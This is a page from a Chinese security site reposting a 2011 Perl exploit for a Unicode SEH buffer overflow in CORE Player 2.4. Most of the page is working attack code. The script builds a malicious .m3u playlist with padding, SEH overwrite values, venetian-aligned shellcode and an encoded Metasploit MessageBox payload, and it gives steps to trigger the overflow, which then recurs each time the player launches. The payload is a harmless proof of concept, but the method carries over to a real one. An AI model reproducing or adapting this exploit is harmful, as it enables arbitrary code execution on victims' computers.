首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CORE Multimedia Suite 2011 CORE Player 2.4 Buffer Overflow (.m3u)
来源:Rh0[at]z1p.biz 作者:Rh0 发布时间:2011-03-21  

# Exploit: CORE Multimedia Suite 2011 CORE Player 2.4 Unicode SEH Buffer Overflow Exploit (.m3u)
# Date: 18.03.11
# Author: Rh0[at]z1p.biz
# Software Link: http://mjm-soft.zzl.org/CORE_MMS_2011.zip
# Version: 2.4
# Tested on: WinXP Pro SP3 EN (VirtualBox)

## The application does not crash immediately:
## Open Core Player, go to FILE->LOAD LIST, load the playlist and
## close the program. ==> Reopening it triggers the buffer overflow. <==
## Seems that the playlist gets saved under Load.m3l in the
## programs directory, and everytime the player is opened, the malicious
## playlist triggers the overflow.
## To be able to start the player normally, remove the Load.m3l file

print " [*] Core Player 2.4 Unicode SEH Buffer Overflow Exploit [*] \n\n";

$junk = "C:\\";
$junk .= "A" x 533;  # 536 bytes until nseh overwrite
$nseh = "\x90\xcf";  # becomes nop; add bh,cl (pad)
$seh = "\x59\x4a";  # pop;pop;ret; unicode compatible, 0x004a0059 @ core player.exe

## venetian shellcode
$vSC =
"\x71".   #
"\x58".   # pop eax (eax should then be 0x0012CC14)
"\x71".
"\x5d".   # pop ebp
"\x71".
"\xbb\x08\x41". # mov ebx,0x41000800
"\xf8".   # add al,bh
"\x71".  
"\xbb\x04\x41". # mov ebx,0x41000400
"\xfc".   # add ah,bh  (eax should now point to the payload)
"\x71".
"\x50".   # push eax
"\x71".
"\xc3";   # return

## msf MessageBox alpha_mixed + unicode upper
$payload =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAI".
"AXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTIK0IKXNXYT".
"0L4QJPJPJPJPJPJPJPJPJPJPJPJQ3PCPCPCPCQ3P7PRQIQZQ1PXR0P0Q1P0Q1RKQ1Q1PQP".
"2Q1PBP2Q2PBP0PBPBQ1Q2PXR0P8Q1Q2CEPJQ9PXPYPXRKPMPKPNP9QBPTQ5CDQ9RDR4RQP".
"ZRRPOQ2PCPGPEC1PKT9R2Q4PLPKPQQQPPP0PLPKQ3Q6QDPLPLPKR1C6PGRLPLPKPRQVPVQ".
"XPNRKPCPNPQP0PNRKPVPVQ5QXPPPOQ7C8R2PUPXCCR1Q9PEPQQHR1PKPOQHC1PCR0PNRKR".
"0RLR1P4PGQDPLPKQ3T5Q7PLPLPKPVP4PQP8PRPXPCP1QHQZPNRKPQPZPTQHPLPKQ3QZPGP".
"PPCP1PZPKPKQCQ7Q4PQPYPLPKPGQ4PLPKPGT1PZPNQ5C1PIROQFR1PKRPPKPLPNPLPOCDQ".
"9R0R2QDQ3P7Q9PQQJROPTPMR6QQPOP7PZPKQJPTQ7PKPCPLQ7R4Q7QHQ3Q5PIT1PNRKR0Q".
"JPVQ4QFQQQJPKPCQFPLPKPVRLPPPKPLPKPQPJQ7RLPGT1PZPKPNRKQFQTPNRKR6QQQJPHP".
"KP9R2QTQ7R4PGRLPCR1POP3POQ2R4PHPVQ9PNP4PORYQHQUPLPIPIPRQ5P8PNRNR0PNR4P".
"NPXRLR0PRPMP8PMPOQ9ROPKPOQ9ROPOCIPCCEQFC4PMRKQ3PNQHR8QJPBR2QCPKP7Q5PLR".
"6Q4QFP2PZQ8PLPNPIROQ9ROPIROPOCIPQR5Q7T8Q5P8PPRLPPRLQ5RPPRQQPQCHR0P3R0P".
"2R4RNPEP4Q5P8R4P5PCQ3R2PER0T2PLQ8R1PLPGQDQ5QJPNQYPXQVPRCFPKPOQFP5Q7CDP".
"KP9PKCBQFP0POPKPNPHQ9P2PPPMPMRLPKP7PEPLPGPTPQQ2PICHQ5P1PKPOPKPOPKPOPQT".
"8Q5P4PRCHPERPPQP0Q3PXPPROQ5P9QDP4PEP5PEP8PRQUPPT8R0T0QBPLPPP1Q9PKPLQ8P".
"CRLR1P4PVC9PMQIQHRCR1RXR1PHPERPPET0PQP0R2Q8Q3PYR2QDPET0Q5RZPPC8R0T8R0R".
"PPRPLPPROR0RHPQT4R0C5PERPPPQ5R1RXPRPNR2PIPRC3PPROQBPHQBQUQ3T8R1P0PPPUP".
"EP8Q3QEQDP2Q5RPQFP3PCR8R2RPPRPLPEP1R0RYR2PHPPROQ3Q2QBQ5PERPR1CHPGPPPEC".
"JR1P0R0Q3PPP1PIR9PNC8R0PLQFPDPET4PKP9PMP1QDRQPNP2QBPJPCRPQBRSPRT1R6P2Q".
"9ROPNP0QFR1POP0R6P0PKPOQ3C5Q7CHQ1Q1AA";

open(F,">exploit.m3u");
$buffer .= $junk.$nseh.$seh.$vSC.$payload;
print F $buffer;
close(F);

print " [*] Open Core Player\n";
print " [*] Load the playlist exploit.m3u \n";
print " [*] Close the program\n";
print " [*] Reopen it\n";
print " [*] A Messagebox should pop up.\n\n";
print " [*] Enter to continue [*] ";
<>;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·POP Peeper 3.7 SEH Exploit
·iCMS v1.1 Admin SQLi/Bruteforc
·RealNetworks RealPlayer CDDA U
·libzip 0.9.3 _zip_name_locate
·Mediacoder 2011 RC3 m3u Buffer
·Tugux CMS 1.0_final Multiple V
·MPlayer Lite r33064 m3u SEH Ov
·Fake Webcam v 6.1 Local Crash
·Ftpdmin 1.0 Denial Of Service
·ACTi ASOC 2200 Web Configurato
·SpoonFTP 1.2 Denial Of Service
·Microsoft Source Code Analyzer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved